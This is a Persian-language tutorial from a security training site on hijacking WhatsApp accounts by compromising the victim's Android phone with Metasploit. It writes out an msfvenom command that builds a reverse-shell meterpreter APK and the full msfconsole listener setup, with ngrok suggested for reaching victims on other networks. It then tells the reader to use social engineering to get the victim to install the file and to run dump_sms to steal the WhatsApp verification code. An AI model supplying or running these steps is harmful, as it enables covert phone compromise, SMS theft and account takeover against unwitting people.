آموزش هک حساب واتساپ با کالی لینوکس و از طریق متاسپلویت

0 153

فهرست

هک واتساپ با کالی لینوکس

امروزه واتساپ یکی از محبوب‌ترین پیام‌رسان‌ها بشمار می‌آید. بسیاری از افراد امور مهم زندگی خود شامل پیام‌های خصوصی، اسناد مهم و قرارهای کاری خود را از طریق این پیام‌رسان انتقال می‌دهند. بنابراین ارتقا امنیت آن از اهمیت بسیار زیادی برخوردار است. هم‌چنین در مقاله “۷ روش برای هک واتساپ” به ۷ مورد از شایع‌ترین روش‌های هک واتساپ اشاره کردیم. یادگیری این روش‌ها در کنار نکات مقاله “جلوگیری از هک شدن در واتساپ” می‌تواند کمک بسیار زیادی به کاربران کند تا بتوانند امنیت حساب واتساپ خود را ارتقا دهند و از هک شدن آن جلوگیری کنند. اما در این مقاله قصد داریم یک روش که کمی تخصصی‌تر و مطمئن‌تر هست را معرفی کنیم. این روش هک واتساپ بوسیله کالی لینوکس است. کاربران با یادگیری این روش می‌توانند تا حد زیادی آگاهی لازم در این زمینه را بدست آورند.

هک واتساپ به کمک متاسپلویت

در این آموزش قصد داریم از فریم‌ورک محبوب متاسپلویت که بصورت پیشفرض در کالی لینوکس نصب است استفاده کنیم. همانطور که می‌دانید کالی لینوکس یکی از محبوب‌ترین سیستم عامل های حوزه هک و تست نفوذ می‌باشد. فریم ورک متاسپلویت نیز یکی از قوی‌ترین فریم ورک‌های تست نفوذ در دنیا می‌باشد. بنابراین برای مطالعه این مقاله نیاز است که کالی لینوکس را برروی سیستم خود نصب کنید. آموزش نصب و راه اندازی کالی لینوکس به زبان ساده

این روش از این جهت مطمئن‌تر است که هکر برروی حساب واتساپ شما تمرکز ندارد و در اصل این گوشی شما هست که هک می‌شود. در مقاله “هک گوشی اندروید بوسیله کالی لینوکس” به این اشاره کردیم. در این روش هکر ابتدا یک پیلود مخصوص اندروید آماده می‌کند. سپس پیلود را به قربانی می‌رساند و به کمک تکنیک‌های مهندسی اجتماعی قربانی را متقاعد می‌کند تا آن را برروی تلفن همراه خود اجرا کند. بعد از اینکه قربانی پیلود را برروی گوشی اندرویدی خود اجرا کرد، هکر به تمام SMSهای او دسترسی پیدا می‌کند. سپس از این طریق می‌تواند به حساب واتساپ او نیز دسترسی پیدا کند.

ساخت پیلود با msfvenom

اول از همه می‌بایست پیلود خود را ایجاد کنیم. به زبان ساده، پیلود همان فایلی است که به قربانی می‌دهیم تا آن را برروی تلفن همراه خود اجرا کند.

برای این کار، ترمینال کالی لینوکس را باز کنید و به کمک msfvenom و دستور زیر پیلود را ایجاد کنید:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=7070 R > payload.apk

در این دستور:

  • msfvenom نام ابزار مورد استفاده می‌باشد
  • بوسیله آپشن p نوع پیلود مشخص می‌شود. از آنجاییکه بحث ما در مورد اندروید است، پیلود مورد نظر را بصورت یک reverse_tcp اندرویدی انتخاب می‌کنیم
  • آپشن LHOST آدرس IP هکر می‌باشد. بجای ۱۹۲.۱۶۸.۱.۵۰ باید IP هکر وارد شود که از طریق دستور ifconfig قابل مشاهده است (برای زمانی که مهاجم و قربانی در یک سابنت قرار دارند). اگر قربانی و هکر در یک شبکه مشترک نباشند، مهاجم باید از سرویس‌هایی مثل ngrok استفاده کند و IP که از ngrok دریافت می‌کند را در این قسمت وارد کند. در حالت دیگر می‌تواند از یک آدرس IP که درون NAT قرار ندارد استفاده کند.
  • آپشن LPORT پورت هکر می‌باشد. در اینجا هکر پورتی که انتظار دارد بعدا قربانی به آن متصل شود را انتخاب می‌کند. طبیعتا این پورت نباید مشغول باشد.
  • payload.apk هم نام خروجی می‌باشد. یعنی خروجی msfvenom درون این فایل ریخته می‌شود که این نام را هم می‌توانید به دلخواه خود تغییر دهید.

راه اندازی Listener از msfconsole

حالا که پیلود آماده شده است، باید یک Listener ایجاد کنیم. Listener یک شنونده است! یعنی هکر Listener را راه‌اندازی می‌کند تا به محض اجرا شدن پیلودِ هکر، سیستم او در حال Listen باشد و به تلفن همراه قربانی دسترسی بگیرد. برای ایجاد Listener، ابتدا ترمینال کالی لینوکس را باز کنید و سپس دستور زیر را بزنید تا فریم ورک متاسپلویت باز شود:mdfconsole

بعد از باز شدن کنسول متاسپلویت، دستورات زیر را به ترتیب وارد کنید. اول از همه multi-handler را انتخاب کنید:

use exploit/multi/handler

سپس یک مترپرتر Reverse_tcp را بوسیله دستور زیر راه اندازی کنید:set payload android/meterpreter/reverse_tcp

بعد بوسیله LHOST آدرس IP سیستم خود و بوسیله LPORT پورت مورد نظر خود را انتخاب کنید. بنابراین به ترتیب دستورات زیر را وارد کنید:

set LHOST 192.168.1.3set LPORT 6060

بنابراین ترمینال شما به شکل زیر خواهد بود:

سپس ReverseListenerBindAddress و ReverseListenerBindPort را مشخص می‌کنیم:

set ReverseListenerBindAddress 192.168.1.50
set ReverseListenerBindPort 7070

دسترسی به گوشی تلفن همراه

در نهایت دستور اکسپلویت را وارد کنید تا عملیات آغاز شود:

exploit

حال باید هکر فایل payload.apk را به قربانی برساند و او را متقاعد کند تا آن را برروی گوشی خود نصب کند. در این فاز هکر از تکنیک‌های مهندسی اجتماعی استفاده می‌کند تا نصب این اپلیکیشن را طبیعی و منطقی جلوه دهد.

بعد از برقراری ارتباط با گوشی اندرویدی قربانی، خط فرمان به شکل زیر در می‌آید:

و در اینجا دسترسی ایجاد می‌شود.

حال با زدن دستور help می‌بینیم که حدودا به تمام اختیارات ممکن دسترسی داریم:

دسترسی به SMS واتساپ و هک اکانت واتساپ

حال که هکر به کل تلفن همراه قربانی دسترسی دارد، SMSها را نیز می‌تواند بخواند. این کار بوسیله دستور dump_sms قابل انجام است. یعنی بعد از اینکه دسترسی ایجاد شد، کافیست دستور زیر را وارد کنید تا تمام SMSهای قربانی نمایش داده شود:

dump_sms

بنابراین هکر برای هک واتساپ قربانی، ابتدا شماره او را درون واتساپ وارد می‌کند و سعی می‌کند بوسیله کد امنیتی وارد آن شود. به اینصورت که به محض ارسال SMS توسط واتساپ، هکر دستور dump_sms را وارد می‌کند. کد تایید واتساپ را می‌خواند و براحتی به اکانت واتساپ قربانی نفوذ می‌کند!

درباره ما

ترجنس | thregence.ir
آکادمی ترجنس | edu.thregence.ir
دوره‌های آکادمی ترجنس | courses.thregence.ir
اینستاگرام | instagram.com/thregence
تلگرام | t.me/thregence
یوتوب | https://bit.ly/30mGowo
آپارات | aparat.com/thregence

ارسال یک پاسخ